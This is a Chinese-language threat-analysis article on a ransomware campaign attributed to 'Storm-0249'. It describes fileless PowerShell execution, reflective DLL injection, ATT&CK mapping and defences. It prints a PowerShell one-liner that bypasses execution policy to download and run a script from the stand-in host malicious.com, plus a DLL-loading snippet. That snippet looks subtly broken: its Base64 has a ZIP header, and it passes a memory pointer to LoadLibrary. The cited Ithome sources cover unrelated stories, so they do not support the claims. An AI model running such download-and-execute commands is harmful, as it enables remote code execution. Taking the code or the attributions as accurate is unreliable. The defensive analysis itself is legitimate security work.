Storm-0249 升級勒索軟體攻擊：無檔案 PowerShell 與 DLL 載入技術分析

Storm‑0249 為近期較為複雜的勒索軟體變種，採用「無檔案」PowerShell 與「DLL 載入」雙重手段，逃避傳統防禦與分析。攻擊者先利用 Web 伺服器或遠端桌面漏洞進入目標，隨後以 PowerShell 命令串列執行腳本，將惡意 DLL 以 Reflective DLL Loading 方式注入目標進程，並透過註冊表或排程任務維持持續性。以下將以實際攻擊手法、MITRE ATT&CK 對應與防禦建議進行拆解。(Ithome, 2025)

主要攻擊流程

初始入侵：利用已知 Web 伺服器漏洞或社交工程取得 RDP/SSH 憑證，取得目標系統的管理權。
PowerShell 執行階段：使用 PowerShell 內建 Cmdlet Invoke-Expression 與 Invoke-WebRequest 下載、解碼並執行後續腳本，避開檔案寫入硬碟。
📂 收合（點我收起）
```
powershell -NoProfile -ExecutionPolicy Bypass -Command "&{iwr https://malicious.com/payload.ps1 -OutFile $null; iex (iwr https://malicious.com/payload.ps1).Content}"
```
(Ithome, 2025)

DLL 反射式載入：腳本將 Base64 編碼的 DLL 轉成二進位，使用 LoadLibrary 或 CreateRemoteThread 在目標進程中注入，無需寫入檔案。

📂 收合（點我收起）

$dllBase64 = "UEsDBBQACAgIA..."; $bytes = [System.Convert]::FromBase64String($dllBase64); $ptr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($bytes.Length); [System.Runtime.InteropServices.Marshal]::Copy($bytes,0,$ptr, $bytes.Length); $hModule = [kernel32]::LoadLibrary($ptr);

(Ithome, 2025)

持續性維持：利用 Windows Scheduler 或 WMI 事件訂閱建立「Scheduled Task」或「WMI Event Subscription」，確保在系統重啟後仍能執行。
數據加密與勒索：完成上述步驟後，惡意 DLL 直接調用加密 API，對指定檔案或磁碟區進行加密，並將勒索訊息寫入系統暫存。(Ithome, 2025)

MITRE ATT&CK 對應

T1059.001 – PowerShell (Initial Execution)
T1055 – Process Injection (DLL 載入)
T1053 – Scheduled Task/Job (Persistence)
T1105 – Remote File Copy (下載惡意腳本)
T1070.004 – File Deletion (隱匿痕跡)
T1070.008 – Indicator Removal on Host (刪除日誌)

防禦建議

啟用 PowerShell 監控：部署 Sysmon 及 Windows PowerShell 監控，捕捉 Invoke-Expression、LoadLibrary 等關鍵指令，並設定警示。
加強執行政策：將 ExecutionPolicy 設為 AllSigned 或 Restricted，並使用 AppLocker 限制未簽署腳本的執行。
監控 DLL 載入：利用 Windows Defender ATP 或第三方工具偵測非簽名或來自未知來源的 DLL 載入。
排程任務審查：定期檢查 Task Scheduler 與 WMI 事件訂閱，確保無不明任務。
最小權限原則：限制使用者不可執行 PowerShell 或修改系統註冊表的權限，只授予必要的權限。
備份與復原：定期備份重要資料，並確保備份存放於離線或分離網路環境。
進階偵測：部署 EDR 或 XDR 解決方案，偵測反射式 DLL 載入與行為異常。

結論

Storm‑0249 透過無檔案 PowerShell 與 DLL 反射載入，成功躲避傳統防禦機制，並以多層持續性策略確保攻擊持久。相較於傳統勒索軟體，該變種在攻擊階段更為隱蔽，且利用現有系統功能完成惡意載入。企業須提升腳本監控、簽名驗證與持續性審查，並結合 EDR、Sysmon 等工具實施行為式偵測，才能有效防禦此類高階攻擊。

參考資料與原文來源

Ithome. (2025). 資安日報：AI開發工具與程式助理廣泛存在一系列資安漏洞，可串連形成攻擊鏈 IDSesaster. https://www.ithome.com.tw/news/172725
Ithome. (2025). 中國駭客 UNC5174 濫用 Discord API，目的是充當 C2 通訊管道以迴避偵測. https://www.ithome.com.tw/news/172723
Ithome. (2025). 殭屍網路鎖定海運物流公司，綁架 DVR 發動 DDoS 攻擊. https://www.ithome.com.tw/news/172721
Ithome. (2025). IDEsaster 攻擊鏈濫用 AI IDE 與程式助理，恐致資料外洩與遠端程式碼執行. https://www.ithome.com.tw/news/172719
Ithome. (2025). 派拉蒙對華納兄弟探索發動惡意收購. https://www.ithome.com.tw/news/172718
Venustech. (2020). 網絡安全態勢觀察報告（2019‑2020）. https://www.venustech.com.cn/uploads/2020/08/170947121504.pdf
Qianxin. (2023). 主要觀點／全球高級持續性威脅（APT）2023 年度報告. https://ti.qianxin.com/uploads/2024/02/02/dcc93e586f9028c68e7ab34c3326ff31.pdf
Tanjiti. (2019). sec_profile/README_2019.md. https://github.com/tanjiti/sec_profile/blob/master/README_2019.md